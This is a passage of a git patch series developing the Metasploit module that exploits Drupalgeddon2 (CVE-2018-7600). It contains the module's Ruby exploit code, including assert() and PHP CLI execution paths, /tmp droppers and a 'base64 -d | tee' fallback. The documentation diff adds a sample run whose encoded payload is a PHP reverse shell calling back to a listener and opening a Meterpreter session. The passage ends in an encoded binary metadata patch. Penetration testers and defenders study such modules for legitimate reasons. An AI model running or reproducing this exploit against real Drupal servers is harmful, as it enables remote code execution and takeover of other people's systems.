Vu Date: Tue, 24 Apr 2018 21:00:36 -0500 Subject: [PATCH 51/65] Remove block quote and add version to sample run The block quote was ripped directly from the module description. It isn't necessary in the dedicated documentation. Reads better now. --- .../modules/exploit/unix/webapp/drupal_drupalgeddon2.md | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md index 8bf6f64d0b..5258a24c7f 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md +++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md @@ -1,8 +1,7 @@ ## Intro -> This module exploits a Drupal property injection in the Forms API. -> Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are -> vulnerable. +This module exploits a Drupal property injection in the Forms API. +Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable. ## Setup @@ -71,6 +70,8 @@ Defaults to the current working directory (usually the webapp root). ## Usage +### Drupal 7.57 from Docker image + ``` msf5 > use exploit/unix/webapp/drupal_drupalgeddon2 msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.17.0.3 From e03ebf94461c5fe336fbbb4301bb783a1cd55583 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 24 Apr 2018 21:06:38 -0500 Subject: [PATCH 52/65] Don't make a header out of tested version Reads a little better now. --- .../modules/exploit/unix/webapp/drupal_drupalgeddon2.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md index 5258a24c7f..bf08707347 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md +++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md @@ -70,7 +70,7 @@ Defaults to the current working directory (usually the webapp root). ## Usage -### Drupal 7.57 from Docker image +Drupal 7.57 from the Docker image is tested below. ``` msf5 > use exploit/unix/webapp/drupal_drupalgeddon2 From 8bc1417c8c4964e09283a34e4a9207f1087f18a8 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 24 Apr 2018 21:39:52 -0500 Subject: [PATCH 53/65] Use PHP_FUNC as a fallback in case assert() fails Additionally drop a file in a writable directory in case CWD fails. --- .../unix/webapp/drupal_drupalgeddon2.md | 3 +- .../unix/webapp/drupal_drupalgeddon2.rb | 54 ++++++++++++------- 2 files changed, 37 insertions(+), 20 deletions(-) diff --git a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md index bf08707347..0e3e5bc1a2 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md +++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md @@ -66,7 +66,8 @@ Defaults to `false`, meaning the check result is respected. **WritableDir** Set this to a writable directory without `noexec` for binary payloads. -Defaults to the current working directory (usually the webapp root). +Defaults to `/tmp`, but other options may include `/var/tmp` and +`/dev/shm`. ## Usage diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index 3eb31da518..9dfbc17eb0 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -113,7 +113,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Version' => Gem::Version.new('8.x') ] ], - 'DefaultTarget' => 0 # Automatic (PHP In-Memory) + 'DefaultTarget' => 0, # Automatic (PHP In-Memory) + 'DefaultOptions' => {'WfsDelay' => 2} )) register_options([ @@ -124,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote register_advanced_options([ OptBool.new('ForceExploit', [false, 'Override check result', false]), - OptString.new('WritableDir', [false, 'Writable dir for dropped binaries']) + OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp']) ]) end @@ -160,25 +161,25 @@ class MetasploitModule < Msf::Exploit::Remote datastore['DUMP_OUTPUT'] = true end + # NOTE: assert() is attempted first, then PHP_FUNC if that fails case target.name when /PHP In-Memory/ - case @version.to_s - when '7.x' - # In-process execution when assert() is enabled - execute_command(payload.encoded, func: 'assert') - when '8.x' - # XXX: This will spawn a *very* obvious process - execute_command("php -r '#{payload.encoded}'") - end + execute_command(payload.encoded, func: 'assert') + + sleep(wfs_delay) + return if session_created? + + # XXX: This will spawn a *very* obvious process + execute_command("php -r '#{payload.encoded}'") when /Unix In-Memory/ execute_command(payload.encoded) when /PHP Dropper/, /Linux Dropper/ - case @version.to_s - when '7.x' - execute_dropper7 - when '8.x' - execute_dropper8 - end + dropper_assert + + sleep(wfs_delay) + return if session_created? + + dropper_exec end end @@ -192,8 +193,10 @@ class MetasploitModule < Msf::Exploit::Remote super end - def execute_dropper7 - php_file = "#{random_crap}.php" + def dropper_assert + php_file = Pathname.new( + "#{datastore['WritableDir']}/#{random_crap}.php" + ).cleanpath # Return the PHP payload or a PHP binary dropper dropper = get_write_exec_payload( @@ -222,8 +225,11 @@ class MetasploitModule < Msf::Exploit::Remote execute_command(stage2.strip, func: 'assert') end - def execute_dropper8 + def dropper_exec php_file = "#{random_crap}.php" + tmp_file = Pathname.new( + "#{datastore['WritableDir']}/#{php_file}" + ).cleanpath # Return the PHP payload or a PHP binary dropper dropper = get_write_exec_payload( @@ -247,10 +253,20 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, php_file) ) + sleep(wfs_delay) return if session_created? # Last-ditch effort to get a shell with PHP CLI execute_command("php #{php_file}") + + sleep(wfs_delay) + return if session_created? + + register_file_for_cleanup(tmp_file) + + # Fall back on our temp file + execute_command("echo #{dropper} | base64 -d | tee #{tmp_file}") + execute_command("php #{tmp_file}") end def execute_command(cmd, opts = {}) From 2ff0e597a0138c92774786e82dc6c6c20dff5101 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 24 Apr 2018 22:51:33 -0500 Subject: [PATCH 54/65] Add SA-CORE-2018-002 as an AKA ref Makes sense to me. Even though it's technically the advisory. --- modules/exploits/unix/webapp/drupal_drupalgeddon2.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index 9dfbc17eb0..eb46e626d4 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://github.com/a2u/CVE-2018-7600'], ['URL', 'https://github.com/nixawk/labs/issues/19'], ['URL', 'https://github.com/FireFart/CVE-2018-7600'], + ['AKA', 'SA-CORE-2018-002'], ['AKA', 'Drupalgeddon 2'] ], 'DisclosureDate' => 'Mar 28 2018', From ec43801564b341787494218db0cee2459f864b19 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 24 Apr 2018 23:03:27 -0500 Subject: [PATCH 55/65] Add check for patch level in CHANGELOG.txt Looks like 8.x has core/CHANGELOG.txt instead. --- .../unix/webapp/drupal_drupalgeddon2.rb | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index eb46e626d4..b1230a0ad0 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -141,6 +141,11 @@ class MetasploitModule < Msf::Exploit::Remote return CheckCode::Unknown end + if drupal_unpatched? + print_status('Drupal appears unpatched in CHANGELOG.txt') + checkcode = CheckCode::Appears + end + token = random_crap res = execute_command(token, func: 'printf') @@ -335,6 +340,32 @@ class MetasploitModule < Msf::Exploit::Remote end end + def drupal_unpatched? + unpatched = true + + # Check for patch level in CHANGELOG.txt + uri = + case @version.to_s + when '7.x' + normalize_uri(target_uri.path, 'CHANGELOG.txt') + when '8.x' + normalize_uri(target_uri.path, 'core/CHANGELOG.txt') + end + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri + ) + + return unless res && res.code == 200 + + if res.body.include?('SA-CORE-2018-002') + unpatched = false + end + + unpatched + end + def exploit_drupal7(func, code) vars_get = { 'q' => 'user/password', From b7ac16038b81f4d57825ef9a3256df2d38c7f926 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 24 Apr 2018 23:18:51 -0500 Subject: [PATCH 56/65] Correct comment about PHP CLI (it's not our last!) --- modules/exploits/unix/webapp/drupal_drupalgeddon2.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index b1230a0ad0..206d183c3a 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -262,7 +262,7 @@ class MetasploitModule < Msf::Exploit::Remote sleep(wfs_delay) return if session_created? - # Last-ditch effort to get a shell with PHP CLI + # Try to get a shell with PHP CLI execute_command("php #{php_file}") sleep(wfs_delay) From 910e9337fb15c122d5a50a7f7575ac8411026999 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 24 Apr 2018 23:21:22 -0500 Subject: [PATCH 57/65] Use print_good for patch level check, oops --- modules/exploits/unix/webapp/drupal_drupalgeddon2.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index 206d183c3a..fde174fe34 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -142,7 +142,7 @@ class MetasploitModule < Msf::Exploit::Remote end if drupal_unpatched? - print_status('Drupal appears unpatched in CHANGELOG.txt') + print_good('Drupal appears unpatched in CHANGELOG.txt') checkcode = CheckCode::Appears end From 675ed7894817e6196993f0b8ca3eb50facafaad4 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 24 Apr 2018 23:30:05 -0500 Subject: [PATCH 58/65] Update module doc with patch level detection --- .../modules/exploit/unix/webapp/drupal_drupalgeddon2.md | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md index 0e3e5bc1a2..a02eba29cb 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md +++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md @@ -82,16 +82,18 @@ verbose => true msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check [*] Drupal 7.x targeted at http://172.17.0.3/ -[*] Executing with printf(): mGE9am2CAHbvmGg +[+] Drupal appears unpatched in CHANGELOG.txt +[*] Executing with printf(): sdHl4fLONOKfVZL1cEvXuJCuSkue [+] 172.17.0.3:80 The target is vulnerable. msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run [*] Started reverse TCP handler on 172.17.0.1:4444 [*] Drupal 7.x targeted at http://172.17.0.3/ -[*] Executing with printf(): HmsPV8tYlEbF +[+] Drupal appears unpatched in CHANGELOG.txt +[*] Executing with printf(): paAHBb9jyovEnLrrT5lMIB [*] Executing with assert(): eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE3Mi4xNy4wLjEnOyAkcG9ydCA9IDQ0NDQ7IGlmICgoJGYgPSAnc3RyZWFtX3NvY2tldF9jbGllbnQnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigidGNwOi8veyRpcH06eyRwb3J0fSIpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoJGlwLCAkcG9ydCk7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdzb2NrZXRfY3JlYXRlJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoQUZfSU5FVCwgU09DS19TVFJFQU0sIFNPTF9UQ1ApOyAkcmVzID0gQHNvY2tldF9jb25uZWN0KCRzLCAkaXAsICRwb3J0KTsgaWYgKCEkcmVzKSB7IGRpZSgpOyB9ICRzX3R5cGUgPSAnc29ja2V0JzsgfSBpZiAoISRzX3R5cGUpIHsgZGllKCdubyBzb2NrZXQgZnVuY3MnKTsgfSBpZiAoISRzKSB7IGRpZSgnbm8gc29ja2V0Jyk7IH0gc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRsZW4gPSBmcmVhZCgkcywgNCk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazsgfSBpZiAoISRsZW4pIHsgZGllKCk7IH0gJGEgPSB1bnBhY2soIk5s.ZW4iLCAkbGVuKTsgJGxlbiA9ICRhWydsZW4nXTsgJGIgPSAnJzsgd2hpbGUgKHN0cmxlbigkYikgPCAkbGVuKSB7IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgfSB9ICRHTE9CQUxTWydtc2dzb2NrJ10gPSAkczsgJEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTsgaWYgKGV4dGVuc2lvbl9sb2FkZWQoJ3N1aG9zaW4nKSAmJiBpbmlfZ2V0KCdzdWhvc2luLmV4ZWN1dG9yLmRpc2FibGVfZXZhbCcpKSB7ICRzdWhvc2luX2J5cGFzcz1jcmVhdGVfZnVuY3Rpb24oJycsICRiKTsgJHN1aG9zaW5fYnlwYXNzKCk7IH0gZWxzZSB7IGV2YWwoJGIpOyB9IGRpZSgpOw)); [*] Sending stage (37775 bytes) to 172.17.0.3 -[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:43864) at 2018-04-24 03:55:25 -0500 +[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:46654) at 2018-04-24 23:25:17 -0500 meterpreter > getuid Server username: www-data (33) From b8eb7f2a86c3f80bb4efa747b0c752e355fa83bf Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 25 Apr 2018 11:53:26 -0500 Subject: [PATCH 59/65] Set target type instead of regexing names We're no longer matching multiple targets like /In-Memory/ or /Dropper/, so it makes sense to match on a specific value now. Old matching in this commit: 1900aa270813584ad6d45fcf985cc57fe86f7b16. --- .../unix/webapp/drupal_drupalgeddon2.rb | 44 ++++++++++++------- 1 file changed, 28 insertions(+), 16 deletions(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index fde174fe34..f7e2c09cc9 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -53,19 +53,23 @@ class MetasploitModule < Msf::Exploit::Remote # ['Automatic (PHP In-Memory)', 'Platform' => 'php', - 'Arch' => ARCH_PHP + 'Arch' => ARCH_PHP, + 'Type' => :php_memory ], ['Automatic (PHP Dropper)', 'Platform' => 'php', - 'Arch' => ARCH_PHP + 'Arch' => ARCH_PHP, + 'Type' => :php_dropper ], ['Automatic (Unix In-Memory)', 'Platform' => 'unix', - 'Arch' => ARCH_CMD + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory ], ['Automatic (Linux Dropper)', 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_X64] + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper ], # # Drupal 7.x targets (PHP, cmd/unix, native) @@ -73,22 +77,26 @@ class MetasploitModule < Msf::Exploit::Remote ['Drupal 7.x (PHP In-Memory)', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('7.x') + 'Version' => Gem::Version.new('7.x'), + 'Type' => :php_memory ], ['Drupal 7.x (PHP Dropper)', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('7.x') + 'Version' => Gem::Version.new('7.x'), + 'Type' => :php_dropper ], ['Drupal 7.x (Unix In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, - 'Version' => Gem::Version.new('7.x') + 'Version' => Gem::Version.new('7.x'), + 'Type' => :unix_memory ], ['Drupal 7.x (Linux Dropper)', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], - 'Version' => Gem::Version.new('7.x') + 'Version' => Gem::Version.new('7.x'), + 'Type' => :linux_dropper ], # # Drupal 8.x targets (PHP, cmd/unix, native) @@ -96,22 +104,26 @@ class MetasploitModule < Msf::Exploit::Remote ['Drupal 8.x (PHP In-Memory)', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('8.x') + 'Version' => Gem::Version.new('8.x'), + 'Type' => :php_memory ], ['Drupal 8.x (PHP Dropper)', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('8.x') + 'Version' => Gem::Version.new('8.x'), + 'Type' => :php_dropper ], ['Drupal 8.x (Unix In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, - 'Version' => Gem::Version.new('8.x') + 'Version' => Gem::Version.new('8.x'), + 'Type' => :unix_memory ], ['Drupal 8.x (Linux Dropper)', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], - 'Version' => Gem::Version.new('8.x') + 'Version' => Gem::Version.new('8.x'), + 'Type' => :linux_dropper ] ], 'DefaultTarget' => 0, # Automatic (PHP In-Memory) @@ -168,8 +180,8 @@ class MetasploitModule < Msf::Exploit::Remote end # NOTE: assert() is attempted first, then PHP_FUNC if that fails - case target.name - when /PHP In-Memory/ + case target['Type'] + when :php_memory execute_command(payload.encoded, func: 'assert') sleep(wfs_delay) @@ -177,9 +189,9 @@ class MetasploitModule < Msf::Exploit::Remote # XXX: This will spawn a *very* obvious process execute_command("php -r '#{payload.encoded}'") - when /Unix In-Memory/ + when :unix_memory execute_command(payload.encoded) - when /PHP Dropper/, /Linux Dropper/ + when :php_dropper, :linux_dropper dropper_assert sleep(wfs_delay) From 644889a32470c9d1959428c7d1e8e645cc1c617d Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 25 Apr 2018 14:32:26 -0500 Subject: [PATCH 60/65] Add TurnKey Linux ISOs to module doc setup section --- .../modules/exploit/unix/webapp/drupal_drupalgeddon2.md | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md index a02eba29cb..988a26b16f 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md +++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md @@ -7,7 +7,12 @@ Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable. Use the provided Docker images here: . -Tested on the 7.57 and 8.4.5 tags (versions). +Alternatively, you may use TurnKey Linux's distributions: + +Drupal 7.54: +Drupal 8.3.1: + +Tested on 7.57 and 8.4.5 in Docker and 7.54 and 8.3.1 in TurnKey. ## Targets From eb79bc47f0dd11937bf4857209e57ee97d099791 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 25 Apr 2018 17:09:39 -0500 Subject: [PATCH 61/65] update module metadata --- db/modules_metadata_base.pstore | Bin 3017118 -> 2941848 bytes 1 file changed, 0 insertions(+), 0 deletions(-) diff --git a/db/modules_metadata_base.pstore b/db/modules_metadata_base.pstore index eeb49074fbd53e62e4061397d68b48a416f0f243..cb025dfa8b5e78259dbfa6f869d612b6bba82098 100644 GIT binary patch delta 233571 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 